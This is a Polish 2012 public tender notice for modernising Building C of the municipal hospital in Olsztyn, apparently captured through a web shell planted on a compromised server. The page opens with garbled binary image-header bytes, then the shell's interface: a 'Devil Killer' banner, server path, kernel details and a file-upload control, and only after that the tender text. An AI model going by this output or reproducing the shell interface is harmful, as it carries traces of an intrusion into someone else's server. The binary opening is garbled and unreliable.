JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121130/253741-N-2012.html

<p class="kh_header"><b>Olsztyn: modernizacja istniejącego budynku C w zespole zabudowań szpitalnych w celu dostosowania go do pełnionej funkcji wraz z zewnętrznymi robotami sanitarnymi i elektrycznymi w ramach zadania: Przebudowa, rozbudowa i modernizacja obiektów Miejskiego Szpitala Zespolonego przy al. Wojska Polskiego 30 w Olsztynie jako placówki o zasięgu regionalnym z budową pawilonu i bloku operacyjnego</b><br>
<b>Numer ogłoszenia: 253741 - 2012; data zamieszczenia: 30.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> modernizacja istniejącego budynku C w zespole zabudowań szpitalnych w celu dostosowania go do pełnionej funkcji wraz z zewnętrznymi robotami sanitarnymi i elektrycznymi w ramach zadania: Przebudowa, rozbudowa i modernizacja obiektów Miejskiego Szpitala Zespolonego przy al. Wojska Polskiego 30 w Olsztynie jako placówki o zasięgu regionalnym z budową pawilonu i bloku operacyjnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja istniejącego budynku C w zespole zabudowań szpitalnych w celu dostosowania go do pełnionej funkcji. Rozwiązania techniczne zastosowane przy realizacji muszą wykorzystywać najnowszą wiedzę techniczną i wynikać z najlepszych dostępnych technik. Budynek C podlegający przebudowie zlokalizowany jest na terenie Miejskiego Szpitala Zespolonego w Olsztynie przy ul. Niepodległości 44 i jest częścią zabudowań całego kompleksu. W chwili obecnej w budynku mieszczą się apteka i oddziały laryngologii, okulistyki i chirurgii szczękowej. Budynek objęty jest ochroną konserwatorską i wpisany jest do rejestru zabytków województwa warmińsko- mazurskiego. Zakres prac ma na celu dostosowanie obiektu do pełnionej funkcji, do przepisów obowiązującego prawa oraz na poprawę stanu technicznego i przywrócenie budynkowi możliwie wierną oryginałowi zewnętrzną bryłę. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA W ramach przebudowy i remontu w budynku zlokalizowane zostaną: Piwnica - funkcje gospodarcze i techniczne; Parter - pomieszczenia i funkcja apteki pozostają bez zmian; Pierwsze piętro - adaptowane na potrzeby Dziennego Oddziału Laryngologicznego z pokojem diagnostyczno-zabiegowym, pokojami 2-łóżkowymi we wschodnim i blokiem operacyjnym i pomieszczeniami towarzyszącymi w zachodnim skrzydle. Na piętrze drugim planuje się urządzić Oddział Chirurgii Szczękowej z salami łóżkowymi we wschodnim skrzydle, zachodnie adaptując na pomieszczenia lekarskie, zabiegowe i pielęgniarskie. Poddasze przeznaczone będzie na pokoje lekarskie, pielęgniarek, szatnie i pomieszczenia socjalne. W ramach planowanej inwestycji zaprojektowano: 1) odkopanie ścian fundamentowych, oczyszczenie i osuszenie, dezynfekcja i odsolenie ścian; 2) wykonanie izolacji przeciwwilgociowej systemowej oraz przepon poziomych; 3) w piwnicy skucie istniejących tynków, posadzek, wykonanie nowych; 4) zdemontowanie istniejących schodów stalowych w piwnicy, oczyszczenie, pomalowanie, następnie ponowne zamocowanie po wykonaniu nowych posadzek; 5) poddanie renowacji schodów betonowych w piwnicy, oczyszczenie, zaimpregnowanie preparatami do betonu, uzupełnienie ubytków i obłożenie gresem antypoślizgowym na kleju; 6) oczyszczenie ścian zewnętrznych ceglanych parteru, 7) skucie istniejących tynków zewnętrznych i wykonanie nowych; 8) wykonanie i renowacja elewacyjnych detali architektonicznych; 9) likwidację istniejących krat w oknach parteru i piwnic, wykonanie nowych; 10) likwidacja istniejących obróbek blacharskich, parapetów, rynien i rur spustowych; 11) remont zewnętrznych balkonów, renowacja stalowej balustrady, podwyższenie murowanych balustrad; 12) rozbiórkę istniejącej i budowie nowej klatki schodowej; 13) przebudowę łącznika pomiędzy modernizowanym a głównym budynkiem szpitala, w związku z budową schodów i platformy dźwigowej; 14) wymianę więźby dachowej i pokrycia dachowego głównej bryły budynku; 15) wymiana pokrycia dachowego nad szybem dźwigu i parterowa częścią wejściową do szybu dźwigu; 16) wymianę zadaszenia nad półokrągłą częścią klatki schodowej; 17) wymianę części stolarki okiennej i drzwiowej; 18) renowację istniejącej stolarki na klatce schodowej; 19) skucie tynków na ścianach wewnętrznych, wykonanie nowych; 20) zlikwidowanie wszystkich istniejących okładzin na ścianach wewnętrznych; 21) wykonanie nowych posadzek na gruncie w piwnicy; 22) wykonanie nowych posadzek na gruncie na parterze; 23) wykonanie nowych posadzek na I, II piętrze i poddaszu; 24) podniesienie posadzki w holu wejściowym oraz w części pomieszczeń apteki; 25) przebudowę ścianek działowych; 26) wykonanie nowych sufitów podwieszanych; 27) likwidację wszystkich instalacji wewnętrznych, wykonanie nowych wg projektów branżowych; 28) w zakresie branży sanitarnej jest kompleksowa wymiana na nowe instalacje wody zimnej użytkowej, ciepłej z cyrkulacją , instalacje kanalizacji sanitarnej, całego układu grzewczego co oraz zapewnienie wentylacji pomieszczeń wraz z klimatyzacją. 29) modernizacji podlegają również instalacje gazów medycznych z uwagi na nowe wyposażenie obiektu w sprzęt medyczny . Ponieważ istniejący system zastosowany w całym obiekcie szpitalnym jest w systemie AGA; stąd należy utrzymać w tym systemie instalacje gazów medycznych w modernizowanym budynku C 30) Modernizacja w branży instalacji sanitarnych obejmuje również wykonanie nowych przyłączy wod-kan oraz przyłącza instalacji tlenu, próżni, sprężonego powietrza, podtlenku azotu. Do wykonania w trakcie realizacji modernizacji: - 1200 mb. instalacji wody zimnej użytkowej i cyrkulacji - 400 mb. instalacji kanalizacji sanitarnej - 2100 mb. instalacji co oraz 250 mb. instalacji ciepła technologiczego - 1000 mb. instalacji gazów medycznych Modernizacja obiektu przewiduje wykonanie zespołów nawiewnych i wywiewnych na poszczególnej kondygnacji oraz oddzielny zespół nawiewno-wywiewny dla potrzeb Bloku operacyjnego. Projektowane instalacje w budynku: - instalacja wodociągowa wody zimnej, ciepłej i cyrkulacji; - instalacja kanalizacji sanitarnej; - instalacja centralnego ogrzewania; - instalacja wentylacji mechanicznej i klimatyzacji; - instalacja ciepła technologicznego; - gazów medycznych - tablice rozdzielcze; - instalacja oświetleniowa i gniazd wtyczkowych 230 V - instalacja oświetlenia nocnego, awaryjnego i ewakuacyjnego; - instalacja odgromową; - instalacja siłowa - instalacja ochrony od porażeń; - instalacja przyzywowa; - instalacja SAP - instalacja wyrównawcza i elektrostatyczna; - instalacja oddymiająca; W zakresie zagospodarowania terenu projektuje się: - podniesienie terenu przy wejściu głównym do budynku do rzędnej 105,61 - zwężenie jezdni na odcinku 8m do szerokości 4m - wg rzutu parteru; - ukształtowanie terenu przyległego do budynku- obniżenie terenu od strony południowo wschodniej w celu odsłonięcia okien piwnicznych, likwidacja studzienki podokiennej - rzędne wg rzutu parteru; - wykonanie opaski wokół budynku od strony południowej ,wschodniej i zachodniej; - wykonanie schodków i podjazdu do pomieszczeń apteki od strony północnej, likwidacja istniejących murków oporowych; - przebudowę wejścia do piwnicy od strony wschodniej z murkami oporowymi; Instalacje zewnętrzne Wykonanie instalacji kanalizacji deszczowej na terenie Miejskiego Szpitala Zespolonego Prace elektryczne przy wykonaniu przebudowy instalacji zewnętrznych: - linie kablowe SN i stacja transformatorowa SN / NN - rozdzielnia główna NN - linie kablowe NN - przebudowa kabli SN - przebudowa kabli NN Do przełożenia jest przyłącze kanalizacji sanitarnej oraz wykonanie zewnętrznej sieci kanalizacji deszczowej- w trakcie realizacji trasy mogą ulec zmianie, pozostają do wykonania ilościowego z zachowaniem średnic zgodnie z projektem budowlanym. Inwestycja dofinansowania przez Unię Europejską. Tytuł projektu: Przebudowa, rozbudowa i modernizacja Miejskiego Szpitala Zespolonego w Olsztynie jako placówki o zasięgu regionalnym, z budową pawilonu i bloku operacyjnego, przy czym modernizacja istniejących pomieszczeń apteki i pomocniczych na kondygnacji parteru stanowi koszt niekwalifikowany projektu RPWM.03.02.01-28-004/09. Nadzór autorski nad inwestycją sprawuje Biuro Projektów BPBW Sp. z o.o., 10-448 Olsztyn, ul. Głowackiego 28, tel. 89 524-95-00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.24.51.40-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; a ocena jego spełniania zostanie dokonana na podstawie oświadczenia - wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to jest udokumentowania należytego wykonania dwóch robót budowlanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, spełniających następujące warunki: (1) jedna robota budowlana o wartości nie mniejszej niż 4 000 000 złotych brutto, (2) druga robota budowlana o wartości nie mniejszej niż 2 000 000 złotych brutto, która została zrealizowana w odniesieniu do czynnego obiektu budowlanego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; a ocena jego spełniania zostanie dokonana na podstawie oświadczenia - wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>to jest: 3.1. udokumentowania, że osoba, która będzie pełnić funkcję kierownika budowy posiada uprawnienia budowlane, uzyskane w jednej z następujących postaci: - uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń, uzyskane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, - uprawnienia budowlane wydane na podstawie ustawy z dnia 24 października 1974 r. Prawo budowlane (jednolity tekst: Dz. U. z 1981 r., Nr 38, poz. 229 ze zm.) lub ustawy z dnia 31 stycznia 1961 r. Prawo budowlane (Dz. U. z 1965 r. Nr 7, poz. 46 ze zm.) - odpowiadające swym zakresem uprawnieniom budowlanym w specjalności konstrukcyjno - budowlanej bez ograniczeń wydawanym zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, - 3.2. udokumentowania, że osoby, które będą pełnić funkcję kierowników poszczególnych rodzajów robót posiadają: a) uprawnienia budowlane, uzyskane w jednej z następujących postaci: - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, uzyskane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, - uprawnienia budowlane wydane na podstawie ustawy z dnia 24 października 1974 r. Prawo budowlane (tj.: Dz. U. z 1981r., Nr 38, poz. 229 ze zm.) lub ustawy z dnia 31 stycznia 1961 r. Prawo budowlane (Dz. U. z 1965 r. Nr 7, poz. 46 ze zm.) - odpowiadające swym zakresem uprawnieniom budowlanym w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, wydawanym zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane; b) uprawnienia budowlane, uzyskane w jednej z następujących postaci: - uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektro-energetycznych bez ograniczeń, uzyskane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane, - uprawnienia budowlane wydane na podstawie ustawy z dnia 24 października 1974 r. Prawo budowlane (tj. Dz. U. z 1981 r., Nr 38, poz. 229 ze zm.) lub ustawy z dnia 31 stycznia 1961 r. Prawo budowlane (Dz. U. z 1965 r. Nr 7, poz. 46 ze zm.) - odpowiadające swym zakresem uprawnieniom budowlanym w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych bez ograniczeń, wydawanym zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane. - Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dn. 7 lipca 1994 r. - Prawo budowlane (tj. Dz.U. z 2010 r. Nr 243, poz. 1623) rozumie się przez to również odpowiadające im ważne kwalifikacje określone w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. Z 2008 r., Nr 63, poz. 394 ze zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie; a ocena jego spełniania zostanie dokonana na podstawie oświadczenia - wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.6. Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert) W przypadku składania oferty przez podmioty występujące wspólnie, właściwe dokumenty muszą być złożone przez każdy podmiot. 1.7. Wypełniony i podpisany Formularz Ofertowy - zaleca się wykorzystanie wzorów stanowiących załączniki do SIWZ lub przedstawienie wszelkich informacji wymaganych we wzorze, 1.8. Dwa egzemplarze kosztorysów ofertowych (oryginał i kopia), 1.9. Pełnomocnictwo do podpisywania oferty, dokumentów i oświadczeń składanych w przedmiotowym postępowaniu: - w przypadku, gdy umocowanie do reprezentowania Wykonawcy nie wynika ze stosownego dokumentu, a w szczególności z odpisu z właściwego rejestru, - lub w przypadku, gdy oferta zostanie złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Szpital Zespolony w Olsztynie, ul. Niepodległości 44, bud. Administracji, pok. 27, adres e-mail: zamowienia@szpital.olsztyn.pl.</p>
